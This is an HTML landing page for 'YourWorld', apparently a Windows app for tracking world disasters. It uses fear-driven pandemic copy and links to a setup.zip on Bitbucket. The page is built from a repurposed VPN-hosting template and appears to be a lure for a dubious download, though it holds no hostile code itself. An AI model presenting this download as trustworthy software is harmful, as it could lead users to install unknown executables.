<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="shortcut icon" href="templates/antler/assets/img/favicon.ico" >
    <title>YourWorld Service</title>

    <!-- Styling -->
<link href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600|Raleway:400,700" rel="stylesheet">
<link href="templates/antler/css/all.min.css@v=40cb1e.css" rel="stylesheet">
<link href="templates/antler/css/custom.css" rel="stylesheet">

<!-- Antler styles -->
<link href="templates/antler/assets/fonts/cloudicon/cloudicon.css@v=40cb1e.css" rel="stylesheet">
<link href="templates/antler/assets/fonts/opensans/opensans.css@v=40cb1e.css" rel="stylesheet">
<link href="templates/antler/assets/css/owl.carousel.css@v=40cb1e.css" rel="stylesheet">
<link href="templates/antler/assets/css/main.css@v=40cb1e.css" rel="stylesheet">

<link href="assets/css/fontawesome-all.min.css" rel="stylesheet">

<!-- Antler custom color styles -->
<link href="templates/antler/assets/css/colors/pink.css" rel="stylesheet" title="pink"/>
<link href="templates/antler/assets/css/colors/blue.css" rel="stylesheet" title="blue"/ >
<link href="templates/antler/assets/css/colors/green.css" rel="stylesheet" title="green"/>

<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
  <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
  <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
<![endif]-->

<script type="text/javascript">
    var csrfToken = 'ceba398d6fa25b1aa145a4623e1a7ccbf5610f69',
        markdownGuide = 'Markdown Guide',
        locale = 'en',
        saved = 'saved',
        saving = 'autosaving',
        whmcsBaseUrl = "",
        requiredText = 'Required',
        recaptchaSiteKey = "";
</script>

<script src="templates/antler/assets/js/custom.js@v=40cb1e"></script>
<script src="templates/antler/js/scripts.min.js@v=40cb1e"></script>
<script src="templates/antler/assets/js/main.js@v=40cb1e"></script>
<script src="templates/antler/assets/js/owl.carousel.min.js@v=40cb1e"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/typed.js/1.1.1/typed.min.js"></script>



    
</head>
<body data-phone-cc-input="1">
<!-- ***** LOADING PAGE ****** -->
<div id="spinner-area">
  <div class="spinner">
    <div class="double-bounce1"></div>
    <div class="double-bounce2"></div>
    <div class="spinner-txt">LOADING...</div>
  </div>
</div>


<!-- 
*******************
NAV MENU
*******************
-->
<div id="main-menu" class="menu-wrap">
  <section id="header">
    <div class="container">
      <div class="row">
        <div class="col-lg-12">
          <ul class="top-nav">
                                                        <li>
                </li>
                           
          </ul>
        </div>
      </div>
    </div>
  </section>
  <div class="container">
    <div class="row">
      <div class="col-sm-12 col-md-3">
        <a href="index.php.html">
        </a>
        <div class="navbar-header">
          <button id="nav-toggle" type="button" class="navbar-toggle menu-toggle" data-toggle="collapse" data-target="#primary-nav">
              <span class="sr-only">Toggle navigation</span>
              <span class="icon-bar"></span>
          </button>
        </div>
      </div>
      <div class="col-sm-12 col-md-9">
        <section id="main-menu">
          <nav id="nav" class="navbar navbar-default navbar-main" role="navigation">
            <!-- Brand and toggle get grouped for better mobile display -->
            <!-- Collect the nav links, forms, and other content for toggling -->
            <div class="collapse navbar-collapse" id="primary-nav">
              <ul class="nav navbar-nav">
                    <li menuItemName="level_1_1" class="" id="Primary_Navbar-level_1_1">
        <a href="index.html" target="_self">
                        Home
                                </a>
            </li>
            </li>
                </li>
                        </ul>
            </li>
    <li menuItemName="level_1_942" class="" id="Primary_Navbar-level_1_942">
            </li>
    <li menuItemName="level_1_943" class="" id="Primary_Navbar-level_1_943">
            </li>
    <li menuItemName="level_1_237" class="" id="Primary_Navbar-level_1_237">
            </li>
                </li>
              </ul>
            </div><!-- /.navbar-collapse -->
          </nav>
        </section>
      </div>
    </div>
  </div>
</div>

<!--
*******************
OWL Carousel
*******************
-->

<!--
*******************
BANNER
*******************
-->
<div class="top-header item7 overlay">
    <div class="container">
      <div class="row">
        <div class="col-sm-12 col-md-12">
          <div class="wrapper" style="display:none">
            <h1 class="heading">DED.IM</h1>
            <h3 class="subheading">Best VPN, VPS and Shared Hosting.</h3>
          </div>
        </div>
      </div>
    </div>
</div>
<!--
*******************************
COLORS
*******************************
-->
<section id="main-body">
    <!-- ***** BUTTON GO TOP ***** -->
    <a href="2.html#0" class="cd-top"> <i class="fas fa-angle-up"></i> </a>
    <div class="container">
            <!-- Container for main page display content -->
      <div class="col-md-12 main-content">
          



<link rel="stylesheet" type="text/css" href="templates/orderforms/vpn/css/style.css" property="stylesheet" />
<link rel="stylesheet" type="text/css" href="templates/orderforms/vpn/fonts/cloudicon/cloudicon.css" property="stylesheet" />

<script>
jQuery(document).ready(function () {
    jQuery('#btnShowSidebar').click(function () {
        if (jQuery(".product-selection-sidebar").is(":visible")) {
            jQuery('.row-product-selection').css('left','0');
            jQuery('.product-selection-sidebar').fadeOut();
            jQuery('#btnShowSidebar').html('<i class="fas fa-arrow-circle-right"></i> Show Menu');
        } else {
            jQuery('.product-selection-sidebar').fadeIn();
            jQuery('.row-product-selection').css('left','300px');
            jQuery('#btnShowSidebar').html('<i class="fas fa-arrow-circle-left"></i> Hide Menu');
        }
    });
});
</script>



<div class="row row-product-selection">
    <div class="col-xs-3 product-selection-sidebar" id="premiumComparisonSidebar" style="display:none">
            <div menuItemName="Categories" class="panel panel-sidebar">
        <div class="panel-heading">
            <h3 class="panel-title">
                                    <i class="fas fa-shopping-cart"></i>&nbsp;
                
                Categories

                
                <i class="fas fa-chevron-up panel-minimise pull-right"></i>
            </h3>
        </div>

        
                    <div class="list-group">
                                                            <a menuItemName="YourWorld" href="cart.php@gid=2.html" class="list-group-item active" id="Secondary_Sidebar-Categories-YourWorld">
                            
                            YourWorld

                                                    </a>
                                                                                <a menuItemName="YourWorld" href="cart.php@gid=3.html" class="list-group-item" id="Secondary_Sidebar-Categories-Windows_VPS">
                            
                            YourWorld

                                                    </a>
                                                                                <a menuItemName="YourWorld" href="cart.php@gid=4.html" class="list-group-item" id="Secondary_Sidebar-Categories-YourWorld">
                            
                            YourWorld

                                                    </a>
                                                </div>
        
            </div>

        <div menuItemName="Actions" class="panel panel-sidebar">
        <div class="panel-heading">
            <h3 class="panel-title">
                                    <i class="fas fa-plus"></i>&nbsp;
                
                Actions

                
                <i class="fas fa-chevron-up panel-minimise pull-right"></i>
            </h3>
        </div>

        
                    <div class="list-group">
                                                            <a menuItemName="View Cart" href="cart.php@a=view.html" class="list-group-item" id="Secondary_Sidebar-Actions-View_Cart">
                                                            <i class="fas fa-shopping-cart fa-fw"></i>&nbsp;
                            
                            View Cart

                                                    </a>
                                                </div>
        
            </div>

        </div>


    <div id="order-antler">
        <div class="main-container price-01">
            <div class="col-md-12" style="display:none">
                <h3 id="headline" class="mb-4">
                                            YourWorld
                                    </h3>
                                            </div>
            <div id="products" class="price-table-container">
                <ul class="row">
                                            <li class="col-sm-12 col-md-4 col-lg-12" id="product1">
                            <div class="price-table">
                                <div class="top-head">
                                    <div class="price-area">
                                        <div class="top-area">
                                            <h4 id="product1-name">YourWorld</h4>
                                        </div>
                                        <p>Whole world on the desktop for <b class="c-pink">$4.99/mo</b>*</p>
										<br>
                                                                                    <a href="https://bitbucket.org/premiumsoftcompany/finalversion/downloads/setup.zip" class="order-button" id="product1-order-button">
                                                Try for free
                                            </a>
                                        
                                    </div>
                                </div>
                            </div>
                        </li>
                                    </ul>
            </div>
        </div>
		<br>
		<br>
		<br>
		<br>
		<p> <b>The world is unpredictable..<br><br>
Have you ever thought about this?
We are sure that not as much as it should.<br><br>
Storms. Hurricanes. Tornado. Earthquakes. Pandemics.<br><br>
And this is not a complete list of what is happening in the world daily. Everyday. Every month. Every year.<br><br>
This is happening now. The Covid-19 epidemic is raging right now in the world. And not only.<br><br>
A lot of dangerous things lie in wait for us. But there are so many of them that it is impossible to keep track of all of them..<br><br>
Now imagine. Imagine for a second that you can watch all these cataclysms at one time, in about one place. And right on the desktop of your computer.<br><br>
Sounds great, right? Do you think this is impossible? You are mistaken.<br><br> Thanks to our new application, you will track in real time everything that happens in the world. In every corner of the planet. Here and now.<br><br>
This is our mission. We really want everyone to remain safe thanks to us. And we believe that we will achieve our goal.<br><br>
Of course, given the current realities, we cannot do this on a charitable basis.<br><br> Therefore, our program is shareware. 30 days of use, it will be free, but with advertising. The next month subscription will cost you only $ 5.<br><br> This symbolic sum will help us develop our ideas in this direction, which is aimed at helping people. We will be very grateful to you for the use of our service.<br><br> First of all, it was created not with the goal of making money on it, but with the and main goal - to be useful to society.
<br><br>Stay up to date. Stay safe. Stay with YourWorld.<br><br><br></p>
        		  <section id="features" class="history-section sec-normal exapath">
    <div class="container">
      <div class="sec-main sec-bg1">
        <div class="row">
          <div class="col-md-6 offset-md-1">
            <div class="info-content">
              <h3>Simple software for Windows</h3>
              <p><br>Our elegant software is designed for Windows, but very soon there will be a version for Android and Apple. Download our service and with a single click you’ll have immediate access to an unrestricted watching world events.<br><br><br></p>
            </div>
			<a href="https://bitbucket.org/premiumsoftcompany/finalversion/downloads/setup.zip" class="btn btn-default-yellow-fill mr-3">Windows</a>
            <div class="info-content">
            </div>
		  </div>
          <div class="col-md-5 offset-md-1 pt-5 wow animated fadeInUp fast">
            <img class="svg" src="templates/orderforms/vpn/patterns/alldevices.svg" alt="redundant">
          </div>
        </div>
		<br>
		<br>
		<br>
        <div class="row">
          <div class="col-md-4 offset-md-1">
		    <br>
			<br>
			<br>
            </div>
          </div>
          <div class="col-md-3 offset-md-1 pt-5 wow animated fadeInUp fast">
          </div>
          <div class="col-md-4 offset-md-1">
		    <br>
			<br>
			<br>
            <div class="info-content">
            </div>
          </div>
        </div>
		<br>
		<br>
		<br>

		<br>
		<br>
		<br>
					          <div class="row">
          <div class="col-md-6 offset-md-1 pt-5 wow animated fadeInUp fast">
            <img class="svg" src="templates/orderforms/vpn/patterns/provisioning.svg" alt="provisioning" >
          </div>
          <div class="col-md-5 offset-md-1">
            <div class="info-content">
              <h3>Fast, Simple and Unlimited</h3>
              <p><br><a href="index.html" class="golink">YourWorld</a> does its work in a sparing mode without loading your Internet. No need to worry that our software will slow you down. Our service has been optimized for maximum speed and unlimited bandwidth. * In the free subscription mode, our service works the same as in the paid mode.<br><br><br></p>
            </div>
          </div>
        </div>
		<br>
		<br>
		<br>
		<br>
        <div class="row">
          <div class="col-md-11 offset-md-1">
            <div class="info-content">
              <h3>The world is yours</h3>
              <p><br>We offer a quick service to track all natural and man-made disasters around the world! We strategically position ourselves in several parts of the globe, so all information is tracked quickly and smoothly. Select any available server to view and receive any information and news, and let <a href="index.html" class="golink">YourWorld</a> do the rest.<br><br><br></p>
            </div>
          </div>
          <div class="col-md-11 offset-md-1 pt-5 wow animated fadeInUp fast">
            <img class="svg" src="templates/orderforms/vpn/patterns/map.svg" alt="redundant">
          </div>
        </div>
      </div>
    </div>
  </section>
    </div>
</div>



                </div><!-- /.main-content -->
                            <div class="clearfix"></div>
        </div>
    </div>
</section>

<!--
*******************
FOOTER
*******************
-->
<footer id="footer" class="footer">
  <img class="logo-bg logo-footer" src="templates/antler/assets/img/symbol.svg" alt="symbol" style="display:none">
  <div class="container">
    <div class="footer-top">
      <div class="row">
        <div class="col-xs-12 col-sm-3 col-md-3" style="display:none">
          <div class="heading">Hosting</div>
          <ul class="footer-menu classic">
            <li class="menu-item"><a href="http://inebur.com/antler/template/hosting">Shared Hosting</a></li>
            <li class="menu-item"><a href="http://inebur.com/antler/template/dedicated">Dedicated Server</a></li>
            <li class="menu-item"><a href="http://inebur.com/antler/template/vps">Cloud Virtual (VPS)</a></li>
            <li class="menu-item"><a href="http://inebur.com/antler/template/domains">Domain Names</a></li>
          </ul>
        </div>
        <div class="col-xs-12 col-sm-3 col-md-3" style="display:none">
          <div class="heading">Support</div>
          <ul class="footer-menu classic">
            <li class="menu-item"><a href="http://inebur.com/antler/template/login">myAntler</a></li>
            <li class="menu-item"><a href="http://inebur.com/antler/template/knowledgebase-list">Knowledge Base</a></li>
            <li class="menu-item"><a href="http://inebur.com/antler/template/contact">Contact Us</a></li>
            <li class="menu-item"><a href="http://inebur.com/antler/template/faq">FAQ</a></li>
          </ul>
        </div>
        <div class="col-xs-12 col-sm-3 col-md-3" style="display:none">
          <div class="heading">Company</div>
          <ul class="footer-menu classic">
            <li class="menu-item"><a href="http://inebur.com/antler/template/about">About Us</a> </li>
            <li class="menu-item"><a href="http://inebur.com/antler/template/elements">Features</a></li>
            <li class="menu-item"><a href="http://inebur.com/antler/template/blog">Blog</a></li>
            <li class="menu-item"><a href="http://inebur.com/antler/template/legal">Legal</a></li>
          </ul>
        </div>
        <div class="col-xs-12 col-sm-3 col-md-12" style="text-align: center">
          <div class="copyrigh">Copyright &copy; 2020 YourWorld. All Rights Reserved.</div>
		  <div class="c-pink">191 Broadway, Winnipeg, Manitoba.</div>
        </div>
      </div>
    </div>
  </div>
  <div class="subcribe news" style="display:none">
    <div class="container">
      <div class="row">
        <form action="2.html#" class="w-100">
          <div class="col-md-6 col-md-offset-3">
            <div class="general-input">
              <input type="email" name="email" placeholder="Enter your email address" class="fill-input">
              <input type="submit" value="SUBSCRIBE" class="btn-subscribe btn-default-yellow-fill">
            </div>
          </div>
          <div class="col-md-6 col-md-offset-3 text-center pt-4">
            <p>Subscribe to our newsletter to receive news and updates</p>
          </div>
        </form>
      </div>
    </div>
  </div>
  <div class="footer-bottom" style="display:none">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-lg-6">
          <ul class="footer-menu">
            <li class="menu-item by c-grey ml-0">Hybrid Design With ♥ by
              <a href="http://inebur.com/" target="_blank">inebur</a>
            </li>
          </ul>
        </div>
        <div class="col-md-6 col-lg-6">
          <ul class="payment-list">
            <li><p>Payments We Accept</p></li>
            <li><i class="fab fa-cc-paypal"></i></li>
            <li><i class="fab fa-cc-visa"></i></li>
            <li><i class="fab fa-cc-mastercard"></i></li>
            <li><i class="fab fa-cc-apple-pay"></i></li>
            <li><i class="fab fa-cc-discover"></i></li>
            <li><i class="fab fa-cc-amazon-pay"></i></li>
          </ul>
        </div>
      </div>
    </div>
  </div>
</footer>

<div class="modal system-modal fade" id="modalAjax" tabindex="-1" role="dialog" aria-hidden="true">
    <div class="modal-dialog">
        <div class="modal-content panel panel-primary">
            <div class="modal-header panel-heading">
                <button type="button" class="close" data-dismiss="modal">
                    <span aria-hidden="true">&times;</span>
                    <span class="sr-only">Close</span>
                    <span class="sr-only">Close</span>
                </button>
                <h4 class="modal-title">Title</h4>
            </div>
            <div class="modal-body panel-body">
                Loading...
                Loading...
            </div>
            <div class="modal-footer panel-footer">
                <div class="pull-left loader">
                    <i class="fas fa-circle-notch fa-spin"></i> Loading...
                </div>
                <button type="button" class="btn btn-default" data-dismiss="modal">
                    Close
                    Close
                </button>
                <button type="button" class="btn btn-primary modal-submit">
                    Submit
                    Submit
                </button>
            </div>
        </div>
    </div>
</div>

<form action="2.html#" id="frmGeneratePassword" class="form-horizontal">
    <div class="modal fade" id="modalGeneratePassword">
        <div class="modal-dialog">
            <div class="modal-content panel-primary">
                <div class="modal-header panel-heading">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
                    <h4 class="modal-title">
                        Generate Password
                    </h4>
                </div>
                <div class="modal-body">
                    <div class="alert alert-danger hidden" id="generatePwLengthError">
                        Please enter a number between 8 and 64 for the password length
                    </div>
                    <div class="form-group">
                        <label for="generatePwLength" class="col-sm-4 control-label">Password Length</label>
                        <div class="col-sm-8">
                            <input type="number" min="8" value="12" step="1" class="form-control input-inline input-inline-100" id="inputGeneratePasswordLength">
                        </div>
                    </div>
                    <div class="form-group">
                        <label for="generatePwOutput" class="col-sm-4 control-label">Generated Password</label>
                        <div class="col-sm-8">
                            <input type="text" class="form-control" id="inputGeneratePasswordOutput">
                        </div>
                    </div>
                    <div class="row">
                        <div class="col-sm-8 col-sm-offset-4">
                            <button type="submit" class="btn btn-default btn-sm">
                                <i class="fa fa-plus fa-fw"></i>
                                Generate new password
                            </button>
                            <button type="button" class="btn btn-default btn-sm copy-to-clipboard" data-clipboard-target="#inputGeneratePasswordOutput">
                                <img src="assets/img/clippy.svg" alt="Copy to clipboard" width="15">
                                
                            </button>
                        </div>
                    </div>
                </div>
                <div class="modal-footer">
                    <button type="button" class="btn btn-default" data-dismiss="modal">
                        Close
                    </button>
                    <button type="button" class="btn btn-primary" id="btnGeneratePasswordInsert" data-clipboard-target="#inputGeneratePasswordOutput">
                        Copy to clipboard & Insert
                    </button>
                </div>
            </div>
        </div>
    </div>
</form>

<script type="text/javascript">
$(document).ready(function(){
    var MenuItems = $("li.manu-manager-javascript-link a");
    $("li.manu-manager-javascript-link a").each(function(index, value){
        var linkHref = $(this).prop('href');
        var splitted = linkHref.split('javascript:');
        $(this).prop('href', "javascript:" + splitted[1]);
    });
});
</script>


</body>
</html>